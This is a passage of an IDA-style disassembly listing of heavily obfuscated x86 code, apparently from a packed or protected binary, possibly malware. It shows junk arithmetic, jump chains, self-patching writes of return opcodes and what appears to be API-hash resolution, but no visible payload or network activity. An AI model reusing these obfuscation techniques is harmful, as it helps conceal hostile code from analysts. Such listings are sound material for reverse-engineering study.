		dd 0D21113Dh, 645C32CCh, 0D863h, 5D71AB00h, 66FA4653h
		dd 0D8C85C46h, 36h, 495D7620h, 2A4E4A39h, 1B641715h, 1Bh
		dd 143571B2h, 63237125h
		db 0C6h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_44BF5A:				; CODE XREF: sub_44B86B-C6BFj
		jmp	loc_4486D9
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_451D9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44BF65:				; CODE XREF: sub_442A84-22E0j
		cmp	eax, esi
		jmp	loc_44008A
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------

loc_44BF6C:				; CODE XREF: y2kk37jd:0045097Cj
		pop	ecx
		rol	ecx, 6
		or	ecx, 5E769F2Ah
		rol	ecx, 1Fh
		or	ecx, 0DFAC34F8h
		test	ecx, 8000h
		jmp	loc_44ECCE
; ---------------------------------------------------------------------------

loc_44BF8A:				; CODE XREF: y2kk37jd:0044476Ej
		xchg	ebx, [esp]
		jmp	loc_43B023
; ---------------------------------------------------------------------------
		push	2871A3Eh
		pop	eax
		and	eax, 41E2A3BCh
		add	eax, 99E46239h
		and	eax, 6BA3D9B1h
		jnz	loc_443347

loc_44BFB0:				; CODE XREF: y2kk37jd:0044B71Dj
		jmp	nullsub_261
; ---------------------------------------------------------------------------

loc_44BFB5:				; DATA XREF: y2kk37jd:004480BBo
		cmp	dword ptr [ebp-8], 0
		jz	loc_449133
		jmp	loc_459DC0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_340. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_44BFC5:				; CODE XREF: sub_451634-7603j
		jmp	loc_442D6F
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EDE

loc_44BFCA:				; CODE XREF: sub_444EDE+Aj
		jmp	loc_44C5D8
; END OF FUNCTION CHUNK	FOR sub_444EDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44BFCF:				; CODE XREF: sub_445226+787Fj
		and	ebx, 51B618FBh
		xor	edi, 4AD666B9h
		test	ebp, 0E9A8A3DDh
		jmp	loc_4503F2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		push	offset loc_458608
		jmp	locret_44DBE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_44BFF0:				; CODE XREF: sub_454539-3180j
		jz	loc_4584F9
		mov	ecx, [edx]
		ror	edx, 1Ah
		xchg	ebp, ecx
		jmp	loc_448B55
; END OF FUNCTION CHUNK	FOR sub_454539
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44C003:				; CODE XREF: sub_445568+12EE9j
		jmp	loc_455F4F
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_44C008:				; CODE XREF: sub_44E648:loc_45936Dj
		mov	eax, cs
		xor	al, al
		or	eax, eax
		jnz	loc_44CB83
		jmp	loc_44D0D7
; END OF FUNCTION CHUNK	FOR sub_44E648
; ---------------------------------------------------------------------------

loc_44C019:				; CODE XREF: y2kk37jd:004409CCj
		mov	[esi], ebx

; =============== S U B	R O U T	I N E =======================================



sub_44C01B	proc near		; CODE XREF: sub_455C2D:loc_444F08p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044775D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459FD5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045C441 SIZE 0000000A BYTES

		xchg	ebx, [esp-4+arg_0]
		pop	ebx
		ror	eax, 0Eh
		push	ebx
		mov	ebx, edi
		jmp	loc_45C441
sub_44C01B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C02A:				; CODE XREF: y2kk37jd:loc_455FBCj
		add	eax, ebp
		add	eax, 0AE8CDD31h
		push	ebx
; START	OF FUNCTION CHUNK FOR sub_442EB4

loc_44C033:				; CODE XREF: sub_442EB4:loc_452E0Bj
		mov	ebx, eax
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_44EA5D
; END OF FUNCTION CHUNK	FOR sub_442EB4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_44C03D:				; CODE XREF: sub_44D6A5+9A94j
		jl	loc_452E7A
		jle	loc_441F16
		jmp	sub_452E72
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477F9

loc_44C04E:				; CODE XREF: sub_4477F9:loc_44AEFCj
		pop	edx
		xor	edx, 0A06C2274h
		rol	edx, 3
		xor	edx, 56F9874Dh
		add	edx, 0EA529032h
		jmp	loc_45112D
; END OF FUNCTION CHUNK	FOR sub_4477F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44C069:				; CODE XREF: sub_4458DD+5CA7j
		jo	loc_455907
		adc	eax, 46225FC5h

loc_44C075:				; CODE XREF: sub_4458DD:loc_43D49Aj
		mov	eax, 0CFF9C25h
		call	sub_44113A
		push	ebx
		push	0B9A622Bh
		pop	ebx
		jmp	loc_44FC4D
; END OF FUNCTION CHUNK	FOR sub_4458DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_366. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44C08C:				; CODE XREF: sub_4577FE+4B8Bj
					; y2kk37jd:0045C3A1j
		and	edx, 4113CC0Fh
		add	edx, 0C040200Fh
		mov	[edx], eax
		pop	edx
		jmp	loc_45B63D
; END OF FUNCTION CHUNK	FOR sub_4577FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447832

loc_44C0A1:				; CODE XREF: sub_447832+144F5j
		jmp	nullsub_405
; END OF FUNCTION CHUNK	FOR sub_447832
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E63A

loc_44C0A6:				; CODE XREF: sub_44E63A+3198j
		jmp	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_44E63A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_44C0AB:				; CODE XREF: sub_44F3F5-3B8Fj
		jb	loc_458CBF

loc_44C0B1:				; CODE XREF: y2kk37jd:loc_44C942j
		rol	edi, 17h
		add	edi, 0C16798CAh
		xchg	edi, [esp+0]
		jmp	loc_445C6A
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44C0C3:				; CODE XREF: sub_4411C3+D7D2j
		jmp	nullsub_279
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444693

loc_44C0C8:				; CODE XREF: sub_444693+8F76j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_444693
; ---------------------------------------------------------------------------

loc_44C0CD:				; CODE XREF: y2kk37jd:loc_452727j
		jz	loc_45AB2F
		jmp	loc_451D6A
; ---------------------------------------------------------------------------

loc_44C0D8:				; CODE XREF: y2kk37jd:004466A1j
		jz	loc_45B5F2

loc_44C0DE:				; CODE XREF: y2kk37jd:loc_446692j
		xor	ebx, 0AFD08BDAh
		add	ebx, 0BFC1380h
		xchg	ebx, [esp]
		jmp	loc_452722
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_44C0F2:				; CODE XREF: sub_43B0F5:loc_45C359j
		shl	dword ptr [ebp-8], 8
		jmp	loc_454B51
; ---------------------------------------------------------------------------

loc_44C0FB:				; CODE XREF: sub_43B0F5:loc_43B0FEj
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_454053
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		shl	dword ptr [ebp-8], 8

loc_44C111:				; CODE XREF: sub_43B0F5:loc_44F637j
					; sub_43B0F5:loc_454B51j
		jo	loc_4520F4

loc_44C117:				; CODE XREF: y2kk37jd:loc_451265j
		jmp	loc_4520D7
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45709E

loc_44C11D:				; CODE XREF: sub_45709E-9A0Fj
		jmp	loc_44B52C
; END OF FUNCTION CHUNK	FOR sub_45709E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447041

loc_44C122:				; CODE XREF: sub_447041:loc_44D2A8j
		mov	ebp, ecx
		xchg	ebp, [esp+8+var_8]
		call	sub_458FCE
		xchg	edx, [eax]
		jmp	loc_43F76E
; END OF FUNCTION CHUNK	FOR sub_447041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44132A

loc_44C133:				; CODE XREF: sub_44132A+FB44j
		xchg	ecx, [esp+8+var_8]
		jmp	loc_45C5EB
; END OF FUNCTION CHUNK	FOR sub_44132A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDF4

loc_44C13B:				; CODE XREF: sub_43BDF4:loc_43B03Cj
		push	offset loc_44DCF2
		jmp	nullsub_459
; END OF FUNCTION CHUNK	FOR sub_43BDF4
; ---------------------------------------------------------------------------

loc_44C145:				; DATA XREF: sub_45349E+Fo
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+8]
		call	sub_43D6A6

loc_44C150:				; CODE XREF: y2kk37jd:00451EE6j
		jmp	loc_456D1B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44C155:				; CODE XREF: sub_445226:loc_44C96Cj
		jz	loc_44FA3A
		jmp	loc_45846C
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_44C160:				; CODE XREF: sub_43C7B9:loc_4470D9j
		jnz	loc_45A3CA
		jmp	loc_45BFAA
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44C16B:				; CODE XREF: sub_43F8B8:loc_447E9Aj
		jb	loc_45AA84

loc_44C171:				; CODE XREF: sub_4543B8+1608j
		jmp	loc_45B1CD
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44C176:				; CODE XREF: sub_4507BF-65DBj
		jmp	loc_44AD2D
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_44C17B:				; CODE XREF: y2kk37jd:00440722j
		jmp	loc_441FE7
; ---------------------------------------------------------------------------
		add	ebp, 9B4DE17Bh
		or	ebx, ecx
; START	OF FUNCTION CHUNK FOR sub_44CABF

loc_44C188:				; CODE XREF: sub_44CABF+10j
		jmp	loc_45AA84
; END OF FUNCTION CHUNK	FOR sub_44CABF
; ---------------------------------------------------------------------------

loc_44C18D:				; CODE XREF: y2kk37jd:loc_454B5Bj
		mov	eax, [eax]
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44C18F:				; CODE XREF: sub_43F2F2:loc_452623j
		cmp	byte ptr [eax],	0F1h
		jnz	loc_450C21
		jmp	loc_447D99
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_301. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C19E:				; CODE XREF: y2kk37jd:00454F8Dj
		jmp	loc_459132
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44C1A3:				; CODE XREF: sub_445787+63AAj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465C3

loc_44C1A8:				; CODE XREF: sub_4465C3+Fj
		jmp	loc_443B58
; END OF FUNCTION CHUNK	FOR sub_4465C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_44C1AD:				; CODE XREF: sub_44B508+1616j
		jz	loc_457EA6

loc_44C1B3:				; CODE XREF: sub_44B508:loc_43FA10j
		push	eax
		push	7627F6F5h
		pop	eax
		jmp	loc_4527DF
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44C1BF:				; CODE XREF: sub_43F346:loc_43F39Cj
		mov	[esi], eax
		pop	esi
		popf
		jmp	loc_446AA0
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44C1C8:				; CODE XREF: sub_43C851+65FAj
					; sub_43C851+1649Fj
		mov	eax, [ebp-24h]
		mov	eax, [eax+4]
		push	esi
		mov	esi, edi
		jmp	loc_4494BF
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44C1D6:				; CODE XREF: sub_4448E2+A26Fj
		xchg	edi, [esp+14h+var_14]
		jmp	loc_45062B
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_44C1DE:				; CODE XREF: sub_44D51F:loc_450AC0j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0
		jnz	loc_453B82
		mov	eax, [ebp+var_8]
		jmp	loc_447DF2
; END OF FUNCTION CHUNK	FOR sub_44D51F

; =============== S U B	R O U T	I N E =======================================



sub_44C1F2	proc near		; DATA XREF: sub_4466E0-19CBo
		mov	edx, 0F75CA70h
		call	sub_440CD1
		call	sub_454187
sub_44C1F2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445568

loc_44C201:				; CODE XREF: sub_445568+F73Ej
		jmp	loc_445B0B
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4502E6

loc_44C206:				; CODE XREF: sub_4502E6+7CC1j
		jo	loc_43F488
		mov	ebp, 8FEE598Eh

loc_44C211:				; CODE XREF: sub_45B491:loc_454704j
		mov	eax, [ebp-4]
		push	offset sub_44EEC8
		jmp	nullsub_229
; END OF FUNCTION CHUNK	FOR sub_4502E6
; ---------------------------------------------------------------------------

loc_44C21E:				; CODE XREF: y2kk37jd:loc_453C41j
		jnb	nullsub_100

; =============== S U B	R O U T	I N E =======================================



sub_44C224	proc near		; CODE XREF: sub_453849+5B5Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043DE6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F8C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00453476 SIZE 0000001B BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		pop	edx
		mov	eax, [esp+0]
		push	edx

loc_44C22D:				; CODE XREF: y2kk37jd:00444888j
		jmp	loc_453476
sub_44C224	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C232:				; CODE XREF: y2kk37jd:loc_452F84j
		pop	esi

loc_44C233:				; CODE XREF: y2kk37jd:00445FBBj
					; y2kk37jd:00452964j
		xchg	eax, edx
		call	sub_440CD1
		retn
; ---------------------------------------------------------------------------
		dw 0A794h
dword_44C23C	dd 0			; DATA XREF: y2kk37jd:loc_45295Cr
dword_44C240	dd 684822D3h, 0C82E91CCh, 0F00366Ch, 0FFE3BE85h, 947B68FFh
					; DATA XREF: y2kk37jd:00448323o
					; sub_458DD9-5D31o
		dd 62E9C3C7h
		db 0FAh, 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445557

loc_44C25B:				; CODE XREF: sub_445557:loc_445778j
		call	sub_43DE8B
; END OF FUNCTION CHUNK	FOR sub_445557
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_44C260:				; CODE XREF: sub_457D5A-65A2j
		push	esi
		push	0CE1432A2h
		pop	esi
		or	esi, 5E3959E8h
		and	esi, 0D82C30B2h
		xor	esi, 5EE986Ch
		jmp	loc_45556C
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A7D

loc_44C27E:				; CODE XREF: sub_459A7D-1134Cj
		or	edx, 952FB730h

loc_44C284:				; CODE XREF: y2kk37jd:004426F4j
		add	edx, 484461E6h
		xchg	edx, [esp+0]
		jmp	loc_453D5B
; END OF FUNCTION CHUNK	FOR sub_459A7D
; ---------------------------------------------------------------------------

locret_44C292:				; CODE XREF: y2kk37jd:00444923j
		retn
; ---------------------------------------------------------------------------
		jns	loc_45942F
		jmp	loc_450DDE
; ---------------------------------------------------------------------------

loc_44C29E:				; DATA XREF: sub_44EA91-EFEo
		push	eax
		mov	eax, ecx

loc_44C2A1:				; CODE XREF: y2kk37jd:loc_453728j
		xchg	eax, [esp]
		push	offset sub_44A6B5
		jmp	locret_457A6C

; =============== S U B	R O U T	I N E =======================================



sub_44C2AE	proc near		; CODE XREF: y2kk37jd:0044BBD1j
					; sub_43F8B8:loc_44F7A1p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444F0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529E2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045639C SIZE 00000027 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	esi
		push	86413F4h
		pop	esi
		or	esi, 0B7B2242Bh
		rol	esi, 13h
		xor	esi, 0BFFDFFB1h
		jmp	loc_444F0D
sub_44C2AE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C2CD	proc near		; DATA XREF: sub_43BF88+A85Co

; FUNCTION CHUNK AT 0045042B SIZE 00000005 BYTES

		add	eax, ebp
		push	edx
		push	offset loc_458214
		jmp	loc_45042B
sub_44C2CD	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_310. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45119A

loc_44C2DB:				; CODE XREF: sub_45119A+1j
		push	0F89C673Dh
		pop	edi
		sub	edi, 4567936Fh
		add	edi, 4D0F138Ch
		xchg	edi, [esp+4+var_4]
		jmp	loc_43E760
; END OF FUNCTION CHUNK	FOR sub_45119A
; ---------------------------------------------------------------------------

loc_44C2F5:				; DATA XREF: sub_456D3F-3293o
		call	sub_454413
		jmp	loc_45706C
; ---------------------------------------------------------------------------
		jmp	loc_441A41

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44C304	proc near		; CODE XREF: sub_4507BF+7p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BA16 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043CD36 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D48C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D783 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043DB1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F650 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441B22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441E49 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443F18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444040 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445DCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A2E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004496E8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044A860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC2C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450529 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00451530 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004516EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045318B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456EB2 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045781B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004586CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A525 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AA9F SIZE 0000000B BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		jmp	loc_43BA16
sub_44C304	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446861

loc_44C312:				; CODE XREF: sub_446861-B43Fj
		adc	edx, [esp+4]
		add	esp, 8
		mov	eax, [eax]
		add	eax, [ebp-4]
		jmp	loc_458766
; END OF FUNCTION CHUNK	FOR sub_446861
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_44C323:				; CODE XREF: sub_43F770+6j
		call	sub_4545F7

loc_44C328:				; CODE XREF: sub_4577FE-19B14j
		jmp	loc_43B1F2
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB02

loc_44C32D:				; CODE XREF: sub_43CB02+19j
		jmp	loc_44D7CC
; END OF FUNCTION CHUNK	FOR sub_43CB02
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C333:				; CODE XREF: y2kk37jd:00441A87j
		jmp	loc_44F0FD
; ---------------------------------------------------------------------------

loc_44C338:				; DATA XREF: y2kk37jd:0044E292o
		push	edi
		push	0DD2D8368h
		pop	edi
		add	edi, 0EF1628A4h
		or	edi, 834CBB7Ah
		rol	edi, 6
		jmp	loc_454F2F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F30

loc_44C353:				; CODE XREF: sub_441F30:loc_44C50Aj
		pop	eax
		and	eax, 746D36DFh
		call	sub_4587BA
; END OF FUNCTION CHUNK	FOR sub_441F30
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_44C35F:				; CODE XREF: sub_455DDE-9258j
		jmp	loc_4422D8
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44C364:				; CODE XREF: sub_4490B4:loc_44C3B3j
		sub	esi, 65EF8092h
		add	esi, 0FD2CF326h
		mov	[esi], eax
		pop	esi
		lea	eax, loc_445512
		mov	byte ptr [eax],	0C3h
		jmp	loc_445512
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------

loc_44C381:				; CODE XREF: y2kk37jd:0044DCE3j
		mov	eax, [esp]
		jmp	loc_441D6E
; ---------------------------------------------------------------------------

loc_44C389:				; DATA XREF: sub_43CF42+1B6D7o
		mov	ecx, 3FBh
		xor	edx, edx
		div	ecx
		push	ecx
		jmp	loc_443EB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_44C398:				; CODE XREF: sub_457524:loc_43D204j
					; sub_457524-147D5j
		jmp	loc_44862D
; ---------------------------------------------------------------------------

loc_44C39D:				; CODE XREF: sub_457524-190A5j
		jno	loc_457639
		lea	eax, [ebp-0Ch]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		push	edi
		jmp	loc_45046F
; END OF FUNCTION CHUNK	FOR sub_457524
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44C3B3:				; CODE XREF: sub_4490B4-3733j
		jmp	loc_44C364
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44C3B8:				; CODE XREF: sub_43F346:loc_456944j
		test	ebp, edi
		jmp	loc_443D71
; END OF FUNCTION CHUNK	FOR sub_43F346
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45484D

loc_44C3C0:				; CODE XREF: sub_45484D-1800Fj
		jmp	nullsub_209
; END OF FUNCTION CHUNK	FOR sub_45484D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44896B

loc_44C3C5:				; CODE XREF: sub_44896B:loc_449049j
		and	edx, 0EC49690Dh
		test	edx, 100000h
		jmp	loc_44D1BB
; END OF FUNCTION CHUNK	FOR sub_44896B
; ---------------------------------------------------------------------------
		shr	esi, 1Fh
		jmp	loc_4575ED
; ---------------------------------------------------------------------------

loc_44C3DE:				; DATA XREF: sub_43D4CE:loc_4520B3o
		push	0FFDA0F87h
		xchg	eax, [esp]
		mov	ebx, eax
		pop	eax
		sub	ebx, 0A545548Eh
		jmp	loc_454063
; ---------------------------------------------------------------------------
		jns	loc_43C6CB
		jmp	sub_459318
; ---------------------------------------------------------------------------

loc_44C3FF:				; CODE XREF: y2kk37jd:loc_443CDAj
		pop	edi
		sub	edi, 9728F845h
		or	edi, 0FC70620Dh
		sub	edi, 7E96EB8Bh
		or	edi, 96B8C924h
		js	loc_4569AA
; START	OF FUNCTION CHUNK FOR sub_457026

loc_44C41E:				; CODE XREF: sub_457026+2CE5j
		jmp	nullsub_299
; END OF FUNCTION CHUNK	FOR sub_457026
; ---------------------------------------------------------------------------
		adc	ebp, edx
		jmp	loc_450AEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44C42A:				; CODE XREF: sub_43C851+A3AAj
		jz	sub_43BC82
		jmp	loc_44CDA4
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		mov	eax, 0EEE68DF1h
		call	sub_44113A
		mov	ds:off_41E044, eax
		lea	eax, sub_454B84
		mov	byte ptr [eax],	0C3h
		jmp	loc_44A553
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B84

loc_44C453:				; CODE XREF: sub_454B84j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_456F33
; END OF FUNCTION CHUNK	FOR sub_454B84
; ---------------------------------------------------------------------------
		push	ebp
		jmp	loc_44EDF2
; ---------------------------------------------------------------------------

loc_44C462:				; CODE XREF: y2kk37jd:loc_43D916j
		and	edi, 1C73235Fh
		jns	loc_44AF6E
; START	OF FUNCTION CHUNK FOR sub_442938

loc_44C46E:				; CODE XREF: sub_442938+17FE9j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454251

loc_44C473:				; CODE XREF: sub_454251+12j
		jmp	loc_445E32
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------
		mov	[eax], ebx
		and	edx, 9251EC53h
		mov	ecx, esi
		mov	ebp, 82AFE273h
		jmp	loc_44E326
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44C48C:				; CODE XREF: sub_445226:loc_4452B7j
					; sub_445226+B4E4j
		add	ebx, 91C5FBE1h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4476B1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		adc	ecx, edx
		jno	loc_458FC6
		jmp	sub_453855
; ---------------------------------------------------------------------------

loc_44C4A7:				; CODE XREF: y2kk37jd:loc_4462C2j
		and	ecx, 7
		mov	eax, 1
		shl	eax, cl
		push	0C7875DD2h
		pop	edx
		jmp	loc_45A727

; =============== S U B	R O U T	I N E =======================================



sub_44C4BC	proc near		; CODE XREF: sub_442081-2998p
					; y2kk37jd:0043FAB2j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440284 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044137C SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044339E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004438C3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448267 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448B01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D0E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D735 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D834 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E25F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E29C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F76D SIZE 0000000B BYTES
